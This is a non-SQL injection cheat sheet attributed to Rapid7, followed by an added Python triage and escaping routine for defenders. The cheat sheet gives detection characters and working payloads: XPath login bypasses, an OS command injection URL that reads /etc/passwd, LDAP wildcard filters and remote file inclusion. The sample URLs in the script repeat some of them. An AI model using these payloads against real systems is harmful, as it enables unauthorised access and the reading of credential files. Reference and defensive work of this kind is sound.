INJECTION CHEAT SHEET (non-SQL)
www.rapid7.com

XML Injection
  Detection
    '            single quote
    "            double quote
    < >          angular parentheses
    XML comment tag
    &            ampersand
    CDATA section delimiters
  Exploitation
    New value of existing tag along with tag name
    http://www.example.com/addUser.php?username=dan&password=1234560foo@emaildomain.com
        Add user as administrator

XPATH Injection
  Detection
    '            single quote
    "            double quote
  Exploitation
    ' or 1=1 or ''='
    '] | * | user[@role='admin
    "//NODENAME"                    returns all elements in the document
    "NODENAME//SUBNODENAME"         returns all SUBNODE under NODE element
    "//NODENAME/[NAME='VALUE']"     returns all NODE that have a NAME child equal to VALUE
    http://site.com/login.aspx?username=foo' or 1=1 or ''='
        Login bypass

OS Command Injection
  Detection
    |            Pipe - on *NIX, output of first command to another; in Windows, multiple commands execution
    ;            semicolon - running two commands together
    %%           Windows only
    &            Running command in background (*NIX only)
  Exploitation
    http://site.com/whois.php?domain=foobar;echo+/etc/passwd
        Displays content of /etc/passwd file

LDAP Injection
  Detection
    (            opening bracket
    )            closing bracket
    |            Pipe - OR operator for LDAP
    &            Ampersand - AND operator for LDAP
    !            Exclamation - NOT operator for LDAP
  Exploitation
    (&(param1=val1)(param2=val2))   AND operator
    (|(param1=val1)(param2=val2))   OR operator
    *)(ObjectClass=*))
    (&(objectClass=void)(ObjectClass=void))(&(objectClass=void
        Blind LDAP Injection using AND operator
    Blind LDAP Injection using OR operator
    http://site.com/ldapsearch?user=*
        Displays list of all users with attributes

XQuery Injection
  Detection
    '            single quote
    "            double quote
  Exploitation
    ' or or .='
    something" or ""="
    http://site.com/xmlsearch?user=foo" or ""="
        Displays list of all users with attributes

SSI Injection
  Detection
    include, echo, exec             Look for word
    .SHTML file extension
  Exploitation
    < ! # = / . " - > and [a-zA-Z0-9]
        Required characters for successful execution
    http://site.com/ssiform.php?showfile=

Remote Code Injection
  Detection
    Upload file                     PHP, JSP, ASP etc. Injecting active content; execution! Access back from webroot
  Exploitation
    Remote file inclusion/injection include($incfile); PHP call
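The detection characters and the LDAP/XPath payload shapes above, turned into a defender's example: a triage routine that reports which injection classes a request parameter matches, and the two query-building steps that make those characters inert. This code is added here and is not part of the Rapid7 cheat sheet. It assumes a uid-based LDAP schema and a //user[name=...] XPath layout (both hypothetical), and the '<!--#' SSI token is derived from the sheet's required-characters list rather than quoted from it; the sample URLs are constructed after the sheet's own.

```python
# Added defensive example for the cheat sheet above (not part of the Rapid7 page).
# Part 1: triage of request parameters against the sheet's detection characters.
# Part 2: building LDAP filters and XPath queries so those characters stay literal.
from urllib.parse import urlsplit, unquote_plus

# Detection characters per injection class, taken from the sheet's Detection columns.
# Assumption: the SSI entry uses the directive opener '<!--#', derived from the
# sheet's required characters; the sheet lists the characters, not this token.
INDICATORS = {
    "xml":    ["'", '"', "<", ">", "<!--", "&", "<![CDATA["],
    "xpath":  ["'", '"'],
    "xquery": ["'", '"'],
    "os":     ["|", ";", "%%", "&"],
    "ldap":   ["(", ")", "|", "&", "!"],
    "ssi":    ["<!--#"],
}

# Extensions the sheet names for active-content uploads (RCE) and SSI pages.
ACTIVE_EXTENSIONS = {"php", "jsp", "asp", "shtml"}


def parse_query(query):
    """Split a raw query string into decoded (name, value) pairs.
    Done by hand rather than with parse_qsl so that ';' inside a value is never
    treated as a pair separator (older Python versions did that by default)."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_value(value):
    """Return the set of injection classes whose detection characters occur in value."""
    return {cls for cls, tokens in INDICATORS.items() if any(t in value for t in tokens)}


def triage_url(url):
    """Map each query parameter of url to the injection classes it matches.
    An empty set means none of the sheet's detection characters are present."""
    return {name: classify_value(value) for name, value in parse_query(urlsplit(url).query)}


def suspicious_upload_name(filename):
    """True if the uploaded filename carries one of the sheet's active-content extensions."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ACTIVE_EXTENSIONS


def escape_ldap_filter_value(value):
    """Escape value for use inside an LDAP search filter (RFC 4515 section 3).
    '(' ')' '*' '\\' and NUL become \\XX hex escapes, so fragments such as '*)(' from
    the sheet's payloads remain literal text instead of filter syntax."""
    return "".join("\\%02x" % ord(c) if c in "\\*()\x00" else c for c in value)


def ldap_user_filter(username):
    """Filter that matches one uid exactly, whatever the username contains (hypothetical schema)."""
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(username)


def xpath_string_literal(value):
    """Render value as an XPath 1.0 string literal. XPath 1.0 has no escape
    sequence inside quotes, so a value holding both quote kinds is assembled
    with concat(), each piece quoted with the kind it does not contain."""
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    parts = []
    for piece in value.split("'"):
        if piece:
            parts.append("'%s'" % piece)  # piece has no apostrophe, may hold double quotes
        parts.append("\"'\"")            # the apostrophe that followed this piece
    parts.pop()                           # no apostrophe follows the last piece
    return "concat(%s)" % ", ".join(parts)


def xpath_user_query(username):
    """Query comparing the name element to the literal username (hypothetical layout)."""
    return "//user[name=%s]" % xpath_string_literal(username)


if __name__ == "__main__":
    # Constructed sample requests modelled on the sheet's URLs.
    for url in [
        "http://site.com/login.aspx?username=foo%27+or+1%3D1+or+%27%27%3D%27",
        "http://site.com/whois.php?domain=foobar;echo+/etc/passwd",
        "http://site.com/ldapsearch?user=%2A%29%28objectClass%3D%2A",
        "http://site.com/search?q=hello",
    ]:
        print(url, "->", triage_url(url))
    print(ldap_user_filter("*)(objectClass=*"))
    print(xpath_user_query("foo' or 1=1 or ''='"))
```

A single apostrophe flags three classes at once, so any name like O'Brien lights up the XML/XPath/XQuery rows; treat the triage output as a review signal for logs and WAF tuning, not as a block rule. The escaping half shows why the same inputs are harmless once the application builds the LDAP filter and XPath query this way instead of concatenating the raw parameter.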